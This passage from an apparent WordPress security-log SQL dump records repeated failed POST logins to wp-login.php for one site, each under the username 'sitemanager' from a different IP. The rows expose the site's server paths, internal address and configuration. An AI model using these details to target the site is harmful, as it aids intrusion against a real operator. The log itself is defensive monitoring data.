/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745492590.148818;s:12:\"REQUEST_TIME\";i:1745492590;}}','217.182.158.226',0,'2025-04-24 16:33:11','1970-01-01 00:00:00'),(94105,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35802\";s:11:\"REMOTE_ADDR\";s:14:\"160.16.215.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745492979.6633301;s:12:\"REQUEST_TIME\";i:1745492979;}}','160.16.215.164',0,'2025-04-24 16:39:41','1970-01-01 00:00:00'),(94106,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58096\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.153.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745493381.971086;s:12:\"REQUEST_TIME\";i:1745493381;}}','66.29.153.28',0,'2025-04-24 16:46:23','1970-01-01 00:00:00'),(94107,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53736\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745493774.3290429;s:12:\"REQUEST_TIME\";i:1745493774;}}','66.102.132.19',0,'2025-04-24 16:52:56','1970-01-01 00:00:00'),(94108,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48504\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745494168.402899;s:12:\"REQUEST_TIME\";i:1745494168;}}','192.34.56.148',0,'2025-04-24 16:59:30','1970-01-01 00:00:00'),(94109,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59734\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745494567.120286;s:12:\"REQUEST_TIME\";i:1745494567;}}','68.65.120.171',0,'2025-04-24 17:06:09','1970-01-01 00:00:00'),(94110,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51350\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745494966.27496;s:12:\"REQUEST_TIME\";i:1745494966;}}','162.0.229.109',0,'2025-04-24 17:12:48','1970-01-01 00:00:00'),(94111,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42038\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745495366.7594061;s:12:\"REQUEST_TIME\";i:1745495366;}}','209.172.2.50',0,'2025-04-24 17:19:28','1970-01-01 00:00:00'),(94112,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64488\";s:11:\"REMOTE_ADDR\";s:13:\"83.149.93.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745495771.9895461;s:12:\"REQUEST_TIME\";i:1745495771;}}','83.149.93.194',0,'2025-04-24 17:26:13','1970-01-01 00:00:00'),(94113,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41484\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745496182.5540071;s:12:\"REQUEST_TIME\";i:1745496182;}}','94.23.61.165',0,'2025-04-24 17:33:04','1970-01-01 00:00:00'),(94114,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56338\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745496586.8253729;s:12:\"REQUEST_TIME\";i:1745496586;}}','51.38.119.44',0,'2025-04-24 17:39:48','1970-01-01 00:00:00'),(94115,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 